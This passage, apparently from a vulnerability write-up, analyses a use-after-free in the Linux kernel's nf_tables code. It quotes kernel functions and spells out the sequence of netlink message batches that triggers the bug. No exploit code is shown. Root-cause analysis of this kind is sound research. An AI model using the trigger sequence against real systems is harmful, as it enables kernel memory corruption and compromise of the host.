		<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">set</span><span class="o">-&gt;</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">gc_init</span><span class="p">)</span>
			<span class="k">goto</span> <span class="n">err_set_elem_expr</span><span class="p">;</span>
		<span class="n">set</span><span class="o">-&gt;</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">gc_init</span><span class="p">(</span><span class="n">set</span><span class="p">);</span>
	<span class="p">}</span>

	<span class="k">return</span> <span class="n">expr</span><span class="p">;</span>

<span class="nl">err_set_elem_expr:</span>
	<span class="n">nft_expr_destroy</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">expr</span><span class="p">);</span>
	<span class="k">return</span> <span class="n">ERR_PTR</span><span class="p">(</span><span class="n">err</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
<h1 id="triggering-the-vulnerability">Triggering the vulnerability</h1>
<p>To see how this is a problem that causes a UAF, we can examine what happens when we create certain <code class="language-plaintext highlighter-rouge">nf_tables</code> entities in a particular order. For example, we can create <code class="language-plaintext highlighter-rouge">nft_table</code>, <code class="language-plaintext highlighter-rouge">nft_set</code>, <code class="language-plaintext highlighter-rouge">nft_object</code>, <code class="language-plaintext highlighter-rouge">nft_set_elem</code> etc. <code class="language-plaintext highlighter-rouge">nft_set</code> and <code class="language-plaintext highlighter-rouge">nft_object</code> must belong to an <code class="language-plaintext highlighter-rouge">nft_table</code>, and <code class="language-plaintext highlighter-rouge">nft_set_elem</code> can be created as an element of an <code class="language-plaintext highlighter-rouge">nft_set</code>. We can also specify expressions and/or a reference to an <code class="language-plaintext highlighter-rouge">nft_object</code> when creating an <code class="language-plaintext highlighter-rouge">nft_set_elem</code>. To trigger a UAF, we will need to send two separate batches of messages to netlink. In the first batch, we use messages to create an <code class="language-plaintext highlighter-rouge">nft_table</code> and an <code class="language-plaintext highlighter-rouge">nft_set</code>, and in the second batch we create an <code class="language-plaintext highlighter-rouge">nft_object</code>, followed by an <code class="language-plaintext highlighter-rouge">nft_set_elem</code> with a reference to the created <code class="language-plaintext highlighter-rouge">nft_object</code>, and finally an <code class="language-plaintext highlighter-rouge">nft_set_elem</code> with an <code class="language-plaintext highlighter-rouge">nft_objref_map</code> expression. Note that the order of operations must be in that sequence.
When creating an <code class="language-plaintext highlighter-rouge">nft_object</code>, recall that the object is added to an <code class="language-plaintext highlighter-rouge">nft_trans</code> and this <code class="language-plaintext highlighter-rouge">nft_trans</code> is added to an <code class="language-plaintext highlighter-rouge">nft_net-&gt;commit_list</code>. Meanwhile, the object is added to an <code class="language-plaintext highlighter-rouge">rhltable</code> for future lookups. This means that <code class="language-plaintext highlighter-rouge">nft_net-&gt;commit_list</code> will contain one <code class="language-plaintext highlighter-rouge">nft_trans</code> object upon <code class="language-plaintext highlighter-rouge">nft_object</code> creation.</p>

<p>The next message in the batch is to create an <code class="language-plaintext highlighter-rouge">nft_set_elem</code>, and the function <code class="language-plaintext highlighter-rouge">nf_tables_newsetelem</code> is invoked which calls <code class="language-plaintext highlighter-rouge">nft_add_set_elem</code> to actually carry out the logic of parsing the message data and creating the elem.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">nf_tables_newsetelem</span><span class="p">(</span><span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span><span class="p">,</span>
                                <span class="k">const</span> <span class="k">struct</span> <span class="n">nfnl_info</span> <span class="o">*</span><span class="n">info</span><span class="p">,</span>
                                <span class="k">const</span> <span class="k">struct</span> <span class="n">nlattr</span> <span class="o">*</span> <span class="k">const</span> <span class="n">nla</span><span class="p">[])</span>
<span class="p">{</span>
        <span class="n">table</span> <span class="o">=</span> <span class="n">nft_table_lookup</span><span class="p">(</span><span class="n">net</span><span class="p">,</span> <span class="n">nla</span><span class="p">[</span><span class="n">NFTA_SET_ELEM_LIST_TABLE</span><span class="p">],</span> <span class="n">family</span><span class="p">,</span>
                                 <span class="n">genmask</span><span class="p">,</span> <span class="n">NETLINK_CB</span><span class="p">(</span><span class="n">skb</span><span class="p">).</span><span class="n">portid</span><span class="p">);</span>
        <span class="p">...</span>
        <span class="n">set</span> <span class="o">=</span> <span class="n">nft_set_lookup_global</span><span class="p">(</span><span class="n">net</span><span class="p">,</span> <span class="n">table</span><span class="p">,</span> <span class="n">nla</span><span class="p">[</span><span class="n">NFTA_SET_ELEM_LIST_SET</span><span class="p">],</span>
                                    <span class="n">nla</span><span class="p">[</span><span class="n">NFTA_SET_ELEM_LIST_SET_ID</span><span class="p">],</span> <span class="n">genmask</span><span class="p">);</span>
        <span class="p">...</span>
        <span class="n">nla_for_each_nested</span><span class="p">(</span><span class="n">attr</span><span class="p">,</span> <span class="n">nla</span><span class="p">[</span><span class="n">NFTA_SET_ELEM_LIST_ELEMENTS</span><span class="p">],</span> <span class="n">rem</span><span class="p">)</span> <span class="p">{</span>
                <span class="n">err</span> <span class="o">=</span> <span class="n">nft_add_set_elem</span><span class="p">(</span><span class="o">&amp;</span><span class="n">ctx</span><span class="p">,</span> <span class="n">set</span><span class="p">,</span> <span class="n">attr</span><span class="p">,</span> <span class="n">info</span><span class="o">-&gt;</span><span class="n">nlh</span><span class="o">-&gt;</span><span class="n">nlmsg_flags</span><span class="p">);</span>
                <span class="k">if</span> <span class="p">(</span><span class="n">err</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span>
                        <span class="k">return</span> <span class="n">err</span><span class="p">;</span>
        <span class="p">}</span>
        <span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">nft_add_set_elem</code> first parses the netlink message data to prepare an <code class="language-plaintext highlighter-rouge">nft_set_ext_tmpl</code> which is a template that will be used to initialize the set elem. One step in preparing the template is to check if the message contains a reference to an object that we want the set elem to reference (specified by a netlink attribute <code class="language-plaintext highlighter-rouge">NFTA_SET_ELEM_OBJREF</code> in the message). If there was such an attribute specified, then it looks up the object with <code class="language-plaintext highlighter-rouge">nft_obj_lookup</code> [1] which just looks up the object in the <code class="language-plaintext highlighter-rouge">rhltable</code> containing all objects for that table. It then adds the reference to the <code class="language-plaintext highlighter-rouge">nft_object</code> to the <code class="language-plaintext highlighter-rouge">nft_set_elem</code>’s <code class="language-plaintext highlighter-rouge">nft_set_ext</code> [2]. Finally, the <code class="language-plaintext highlighter-rouge">nft_set_elem</code> is added to an <code class="language-plaintext highlighter-rouge">nft_trans</code>, which is ultimately added to the <code class="language-plaintext highlighter-rouge">nft_net-&gt;commit_list</code> [3]. At this point, <code class="language-plaintext highlighter-rouge">nft_net-&gt;commit_list</code> contains two <code class="language-plaintext highlighter-rouge">nft_trans</code> entries; one for the <code class="language-plaintext highlighter-rouge">nft_object</code> created earlier and one for the new <code class="language-plaintext highlighter-rouge">nft_set_elem</code>.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">nft_add_set_elem</span><span class="p">(</span><span class="k">struct</span> <span class="n">nft_ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span> <span class="k">struct</span> <span class="n">nft_set</span> <span class="o">*</span><span class="n">set</span><span class="p">,</span>
                            <span class="k">const</span> <span class="k">struct</span> <span class="n">nlattr</span> <span class="o">*</span><span class="n">attr</span><span class="p">,</span> <span class="n">u32</span> <span class="n">nlmsg_flags</span><span class="p">)</span>
<span class="p">{</span>
         <span class="p">...</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">nla</span><span class="p">[</span><span class="n">NFTA_SET_ELEM_EXPR</span><span class="p">])</span> <span class="p">{</span>
                <span class="k">struct</span> <span class="n">nft_expr</span> <span class="o">*</span><span class="n">expr</span><span class="p">;</span>

                <span class="k">if</span> <span class="p">(</span><span class="n">set</span><span class="o">-&gt;</span><span class="n">num_exprs</span> <span class="o">&amp;&amp;</span> <span class="n">set</span><span class="o">-&gt;</span><span class="n">num_exprs</span> <span class="o">!=</span> <span class="mi">1</span><span class="p">)</span>
                        <span class="k">return</span> <span class="o">-</span><span class="n">EOPNOTSUPP</span><span class="p">;</span>

                <span class="n">expr</span> <span class="o">=</span> <span class="n">nft_set_elem_expr_alloc</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">set</span><span class="p">,</span>
                                               <span class="n">nla</span><span class="p">[</span><span class="n">NFTA_SET_ELEM_EXPR</span><span class="p">]);</span>
                <span class="p">...</span>
        <span class="p">}</span>
        <span class="p">...</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">nla</span><span class="p">[</span><span class="n">NFTA_SET_ELEM_OBJREF</span><span class="p">]</span> <span class="o">!=</span> <span class="nb">NULL</span><span class="p">)</span> <span class="p">{</span>
                <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="p">(</span><span class="n">set</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">NFT_SET_OBJECT</span><span class="p">))</span> <span class="p">{</span>
                        <span class="n">err</span> <span class="o">=</span> <span class="o">-</span><span class="n">EINVAL</span><span class="p">;</span>
                        <span class="k">goto</span> <span class="n">err_parse_key_end</span><span class="p">;</span>
                <span class="p">}</span>
                <span class="n">obj</span> <span class="o">=</span> <span class="n">nft_obj_lookup</span><span class="p">(</span><span class="n">ctx</span><span class="o">-&gt;</span><span class="n">net</span><span class="p">,</span> <span class="n">ctx</span><span class="o">-&gt;</span><span class="n">table</span><span class="p">,</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
                                     <span class="n">nla</span><span class="p">[</span><span class="n">NFTA_SET_ELEM_OBJREF</span><span class="p">],</span>
                                     <span class="n">set</span><span class="o">-&gt;</span><span class="n">objtype</span><span class="p">,</span> <span class="n">genmask</span><span class="p">);</span>
                <span class="p">...</span>
                <span class="n">nft_set_ext_add</span><span class="p">(</span><span class="o">&amp;</span><span class="n">tmpl</span><span class="p">,</span> <span class="n">NFT_SET_EXT_OBJREF</span><span class="p">);</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">2</span><span class="p">]</span>
        <span class="p">}</span>
        <span class="p">...</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">obj</span><span class="p">)</span> <span class="p">{</span>
                <span class="o">*</span><span class="n">nft_set_ext_obj</span><span class="p">(</span><span class="n">ext</span><span class="p">)</span> <span class="o">=</span> <span class="n">obj</span><span class="p">;</span>
                <span class="n">obj</span><span class="o">-&gt;</span><span class="n">use</span><span class="o">++</span><span class="p">;</span>
        <span class="p">}</span>
         <span class="p">...</span>
        <span class="n">trans</span> <span class="o">=</span> <span class="n">nft_trans_elem_alloc</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">NFT_MSG_NEWSETELEM</span><span class="p">,</span> <span class="n">set</span><span class="p">);</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">trans</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span> <span class="p">{</span>
                <span class="n">err</span> <span class="o">=</span> <span class="o">-</span><span class="n">ENOMEM</span><span class="p">;</span>
                <span class="k">goto</span> <span class="n">err_elem_expr</span><span class="p">;</span>
        <span class="p">}</span>
        <span class="p">...</span>
        <span class="n">nft_trans_elem</span><span class="p">(</span><span class="n">trans</span><span class="p">)</span> <span class="o">=</span> <span class="n">elem</span><span class="p">;</span>
        <span class="n">nft_trans_commit_list_add_tail</span><span class="p">(</span><span class="n">ctx</span><span class="o">-&gt;</span><span class="n">net</span><span class="p">,</span> <span class="n">trans</span><span class="p">);</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">3</span><span class="p">]</span>
        <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
        <span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The third netlink message in our batch is the message to create a second <code class="language-plaintext highlighter-rouge">nft_set_elem</code> with an expression in it. To be clear, we don’t specify an object for this set elem to reference. In the same code block above, we can see that <code class="language-plaintext highlighter-rouge">nft_set_elem_expr_alloc</code> (the buggy function) is called when the netlink message contains a netlink attribute for an expression. The function (shown again) initializes the expression with <code class="language-plaintext highlighter-rouge">nft_expr_init</code> [1] and if the <code class="language-plaintext highlighter-rouge">expr-&gt;ops-&gt;type-&gt;flags</code> [2] does not contain the <code class="language-plaintext highlighter-rouge">NFT_EXPR_STATEFUL</code> flag, then the expression is destroyed and an error is returned.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">nft_expr</span> <span class="o">*</span><span class="nf">nft_set_elem_expr_alloc</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nft_ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span>
                                         <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_set</span> <span class="o">*</span><span class="n">set</span><span class="p">,</span>
                                         <span class="k">const</span> <span class="k">struct</span> <span class="n">nlattr</span> <span class="o">*</span><span class="n">attr</span><span class="p">)</span>
<span class="p">{</span>
        <span class="k">struct</span> <span class="n">nft_expr</span> <span class="o">*</span><span class="n">expr</span><span class="p">;</span>
        <span class="kt">int</span> <span class="n">err</span><span class="p">;</span>

        <span class="n">expr</span> <span class="o">=</span> <span class="n">nft_expr_init</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">attr</span><span class="p">);</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">IS_ERR</span><span class="p">(</span><span class="n">expr</span><span class="p">))</span>
                <span class="k">return</span> <span class="n">expr</span><span class="p">;</span>

        <span class="n">err</span> <span class="o">=</span> <span class="o">-</span><span class="n">EOPNOTSUPP</span><span class="p">;</span>
        <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="p">(</span><span class="n">expr</span><span class="o">-&gt;</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">type</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">NFT_EXPR_STATEFUL</span><span class="p">))</span>   <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">2</span><span class="p">]</span>
                <span class="k">goto</span> <span class="n">err_set_elem_expr</span><span class="p">;</span>

        <span class="k">if</span> <span class="p">(</span><span class="n">expr</span><span class="o">-&gt;</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">type</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">NFT_EXPR_GC</span><span class="p">)</span> <span class="p">{</span>
                <span class="k">if</span> <span class="p">(</span><span class="n">set</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">NFT_SET_TIMEOUT</span><span class="p">)</span>
                        <span class="k">goto</span> <span class="n">err_set_elem_expr</span><span class="p">;</span>
                <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">set</span><span class="o">-&gt;</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">gc_init</span><span class="p">)</span>
                        <span class="k">goto</span> <span class="n">err_set_elem_expr</span><span class="p">;</span>
                <span class="n">set</span><span class="o">-&gt;</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">gc_init</span><span class="p">(</span><span class="n">set</span><span class="p">);</span>
        <span class="p">}</span>

        <span class="k">return</span> <span class="n">expr</span><span class="p">;</span>

<span class="nl">err_set_elem_expr:</span>
        <span class="n">nft_expr_destroy</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">expr</span><span class="p">);</span>
        <span class="k">return</span> <span class="n">ERR_PTR</span><span class="p">(</span><span class="n">err</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Even if the expression we tried to create does not have the <code class="language-plaintext highlighter-rouge">NFT_EXPR_STATEFUL</code> flag, <code class="language-plaintext highlighter-rouge">nft_expr_init</code> is still called first. If we created an expression of <code class="language-plaintext highlighter-rouge">nft_objref_type</code> that has <code class="language-plaintext highlighter-rouge">nft_objref_map_ops</code>, we can see that it does initialize such a flag.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_expr_ops</span> <span class="n">nft_objref_map_ops</span> <span class="o">=</span> <span class="p">{</span>
        <span class="p">.</span><span class="n">type</span>           <span class="o">=</span> <span class="o">&amp;</span><span class="n">nft_objref_type</span><span class="p">,</span>
        <span class="p">.</span><span class="n">size</span>           <span class="o">=</span> <span class="n">NFT_EXPR_SIZE</span><span class="p">(</span><span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span> <span class="n">nft_objref_map</span><span class="p">)),</span>
        <span class="p">.</span><span class="n">eval</span>           <span class="o">=</span> <span class="n">nft_objref_map_eval</span><span class="p">,</span>
        <span class="p">.</span><span class="n">init</span>           <span class="o">=</span> <span class="n">nft_objref_map_init</span><span class="p">,</span>
        <span class="p">.</span><span class="n">activate</span>       <span class="o">=</span> <span class="n">nft_objref_map_activate</span><span class="p">,</span>
        <span class="p">.</span><span class="n">deactivate</span>     <span class="o">=</span> <span class="n">nft_objref_map_deactivate</span><span class="p">,</span>
        <span class="p">.</span><span class="n">destroy</span>        <span class="o">=</span> <span class="n">nft_objref_map_destroy</span><span class="p">,</span>
        <span class="p">.</span><span class="n">dump</span>           <span class="o">=</span> <span class="n">nft_objref_map_dump</span><span class="p">,</span>
<span class="p">};</span>

<span class="k">static</span> <span class="k">struct</span> <span class="n">nft_expr_type</span> <span class="n">nft_objref_type</span> <span class="n">__read_mostly</span> <span class="o">=</span> <span class="p">{</span>
        <span class="p">.</span><span class="n">name</span>           <span class="o">=</span> <span class="s">"objref"</span><span class="p">,</span>
        <span class="p">.</span><span class="n">select_ops</span>     <span class="o">=</span> <span class="n">nft_objref_select_ops</span><span class="p">,</span>
        <span class="p">.</span><span class="n">policy</span>         <span class="o">=</span> <span class="n">nft_objref_policy</span><span class="p">,</span>
        <span class="p">.</span><span class="n">maxattr</span>        <span class="o">=</span> <span class="n">NFTA_OBJREF_MAX</span><span class="p">,</span>
        <span class="p">.</span><span class="n">owner</span>          <span class="o">=</span> <span class="n">THIS_MODULE</span><span class="p">,</span>
<span class="p">};</span>
</code></pre></div></div>

<p>But when <code class="language-plaintext highlighter-rouge">nft_expr_init</code> is called, it parses the expression data, allocates space for it and finally calls <code class="language-plaintext highlighter-rouge">nf_tables_newexpr</code> [1] which just calls the init function of the particular ops for that expression.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="k">struct</span> <span class="n">nft_expr</span> <span class="o">*</span><span class="nf">nft_expr_init</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nft_ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span>
                                      <span class="k">const</span> <span class="k">struct</span> <span class="n">nlattr</span> <span class="o">*</span><span class="n">nla</span><span class="p">)</span>
<span class="p">{</span>
        <span class="k">struct</span> <span class="n">nft_expr_info</span> <span class="n">expr_info</span><span class="p">;</span>
        <span class="k">struct</span> <span class="n">nft_expr</span> <span class="o">*</span><span class="n">expr</span><span class="p">;</span>
        <span class="k">struct</span> <span class="n">module</span> <span class="o">*</span><span class="n">owner</span><span class="p">;</span>
        <span class="kt">int</span> <span class="n">err</span><span class="p">;</span>

        <span class="n">err</span> <span class="o">=</span> <span class="n">nf_tables_expr_parse</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">nla</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">expr_info</span><span class="p">);</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">err</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span>
                <span class="k">goto</span> <span class="n">err1</span><span class="p">;</span>

        <span class="n">err</span> <span class="o">=</span> <span class="o">-</span><span class="n">ENOMEM</span><span class="p">;</span>
        <span class="n">expr</span> <span class="o">=</span> <span class="n">kzalloc</span><span class="p">(</span><span class="n">expr_info</span><span class="p">.</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">size</span><span class="p">,</span> <span class="n">GFP_KERNEL</span><span class="p">);</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">expr</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span>
                <span class="k">goto</span> <span class="n">err2</span><span class="p">;</span>

        <span class="n">err</span> <span class="o">=</span> <span class="n">nf_tables_newexpr</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">expr_info</span><span class="p">,</span> <span class="n">expr</span><span class="p">);</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">err</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span>
                <span class="k">goto</span> <span class="n">err3</span><span class="p">;</span>

        <span class="k">return</span> <span class="n">expr</span><span class="p">;</span>
        <span class="p">...</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kt">int</span> <span class="nf">nf_tables_newexpr</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nft_ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span>
                             <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_expr_info</span> <span class="o">*</span><span class="n">expr_info</span><span class="p">,</span>
                             <span class="k">struct</span> <span class="n">nft_expr</span> <span class="o">*</span><span class="n">expr</span><span class="p">)</span>
<span class="p">{</span>
        <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_expr_ops</span> <span class="o">*</span><span class="n">ops</span> <span class="o">=</span> <span class="n">expr_info</span><span class="o">-&gt;</span><span class="n">ops</span><span class="p">;</span>
        <span class="kt">int</span> <span class="n">err</span><span class="p">;</span>

        <span class="n">expr</span><span class="o">-&gt;</span><span class="n">ops</span> <span class="o">=</span> <span class="n">ops</span><span class="p">;</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">init</span><span class="p">)</span> <span class="p">{</span>
                <span class="n">err</span> <span class="o">=</span> <span class="n">ops</span><span class="o">-&gt;</span><span class="n">init</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">expr</span><span class="p">,</span> <span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nlattr</span> <span class="o">**</span><span class="p">)</span><span class="n">expr_info</span><span class="o">-&gt;</span><span class="n">tb</span><span class="p">);</span>
                <span class="k">if</span> <span class="p">(</span><span class="n">err</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span>
                        <span class="k">goto</span> <span class="n">err1</span><span class="p">;</span>
        <span class="p">}</span>

        <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="nl">err1:</span>
        <span class="n">expr</span><span class="o">-&gt;</span><span class="n">ops</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
        <span class="k">return</span> <span class="n">err</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>For an <code class="language-plaintext highlighter-rouge">objref_map</code> expression, it calls <code class="language-plaintext highlighter-rouge">nft_objref_map_init</code> which looks up the set we are trying to reference using the <code class="language-plaintext highlighter-rouge">objref_map</code> expression and then calls <code class="language-plaintext highlighter-rouge">nf_tables_bind_set</code> on that set.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">nft_objref_map_init</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nft_ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span>
                               <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_expr</span> <span class="o">*</span><span class="n">expr</span><span class="p">,</span>
                               <span class="k">const</span> <span class="k">struct</span> <span class="n">nlattr</span> <span class="o">*</span> <span class="k">const</span> <span class="n">tb</span><span class="p">[])</span>
<span class="p">{</span>
        <span class="p">...</span>
        <span class="n">set</span> <span class="o">=</span> <span class="n">nft_set_lookup_global</span><span class="p">(</span><span class="n">ctx</span><span class="o">-&gt;</span><span class="n">net</span><span class="p">,</span> <span class="n">ctx</span><span class="o">-&gt;</span><span class="n">table</span><span class="p">,</span>
                                    <span class="n">tb</span><span class="p">[</span><span class="n">NFTA_OBJREF_SET_NAME</span><span class="p">],</span>
                                    <span class="n">tb</span><span class="p">[</span><span class="n">NFTA_OBJREF_SET_ID</span><span class="p">],</span> <span class="n">genmask</span><span class="p">);</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">IS_ERR</span><span class="p">(</span><span class="n">set</span><span class="p">))</span>
                <span class="k">return</span> <span class="n">PTR_ERR</span><span class="p">(</span><span class="n">set</span><span class="p">);</span>
        <span class="p">...</span>
        <span class="n">err</span> <span class="o">=</span> <span class="n">nf_tables_bind_set</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">set</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">priv</span><span class="o">-&gt;</span><span class="n">binding</span><span class="p">);</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">err</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span>
                <span class="k">return</span> <span class="n">err</span><span class="p">;</span>

        <span class="n">priv</span><span class="o">-&gt;</span><span class="n">set</span> <span class="o">=</span> <span class="n">set</span><span class="p">;</span>
        <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>In <code class="language-plaintext highlighter-rouge">nf_tables_bind_set</code>, <code class="language-plaintext highlighter-rouge">nft_set_trans_bind</code> is called which checks that the set has the <code class="language-plaintext highlighter-rouge">NFT_SET_ANONYMOUS</code> flag set [1] (configurable by the <code class="language-plaintext highlighter-rouge">nf_tables</code> API user), adds a binding to the set’s bindings list [2] and then goes through the <code class="language-plaintext highlighter-rouge">nft_trans</code> objects currently in the <code class="language-plaintext highlighter-rouge">nft_net-&gt;commit_list</code> [3]. If the <code class="language-plaintext highlighter-rouge">nft_trans</code> was created when we created a new <code class="language-plaintext highlighter-rouge">nft_set_elem</code> (indicated by a netlink message of type <code class="language-plaintext highlighter-rouge">NFT_MSG_NEWSETELEM</code>), it sets the <code class="language-plaintext highlighter-rouge">nft_set_elem</code> to a bound state [4]. Since the <code class="language-plaintext highlighter-rouge">nft_net-&gt;commit_list</code> at this point already contains that first <code class="language-plaintext highlighter-rouge">nft_set_elem</code> which holds a reference to the <code class="language-plaintext highlighter-rouge">nft_object</code> we created, that set elem will be bound.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">nf_tables_bind_set</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nft_ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span> <span class="k">struct</span> <span class="n">nft_set</span> <span class="o">*</span><span class="n">set</span><span class="p">,</span>
                       <span class="k">struct</span> <span class="n">nft_set_binding</span> <span class="o">*</span><span class="n">binding</span><span class="p">)</span>
<span class="p">{</span>
        <span class="p">...</span>
        <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">list_empty</span><span class="p">(</span><span class="o">&amp;</span><span class="n">set</span><span class="o">-&gt;</span><span class="n">bindings</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="n">nft_set_is_anonymous</span><span class="p">(</span><span class="n">set</span><span class="p">))</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
                <span class="k">return</span> <span class="o">-</span><span class="n">EBUSY</span><span class="p">;</span>
        <span class="p">...</span>
<span class="nl">bind:</span>
        <span class="p">...</span>
        <span class="n">list_add_tail_rcu</span><span class="p">(</span><span class="o">&amp;</span><span class="n">binding</span><span class="o">-&gt;</span><span class="n">list</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">set</span><span class="o">-&gt;</span><span class="n">bindings</span><span class="p">);</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">2</span><span class="p">]</span>
        <span class="n">nft_set_trans_bind</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">set</span><span class="p">);</span>
        <span class="n">set</span><span class="o">-&gt;</span><span class="n">use</span><span class="o">++</span><span class="p">;</span>

        <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>


<span class="k">static</span> <span class="kt">void</span> <span class="nf">nft_set_trans_bind</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nft_ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span> <span class="k">struct</span> <span class="n">nft_set</span> <span class="o">*</span><span class="n">set</span><span class="p">)</span>
<span class="p">{</span>
        <span class="k">struct</span> <span class="n">nftables_pernet</span> <span class="o">*</span><span class="n">nft_net</span><span class="p">;</span>
        <span class="k">struct</span> <span class="n">net</span> <span class="o">*</span><span class="n">net</span> <span class="o">=</span> <span class="n">ctx</span><span class="o">-&gt;</span><span class="n">net</span><span class="p">;</span>
        <span class="k">struct</span> <span class="n">nft_trans</span> <span class="o">*</span><span class="n">trans</span><span class="p">;</span>

        <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">nft_set_is_anonymous</span><span class="p">(</span><span class="n">set</span><span class="p">))</span>
                <span class="k">return</span><span class="p">;</span>

        <span class="n">nft_net</span> <span class="o">=</span> <span class="n">nft_pernet</span><span class="p">(</span><span class="n">net</span><span class="p">);</span>
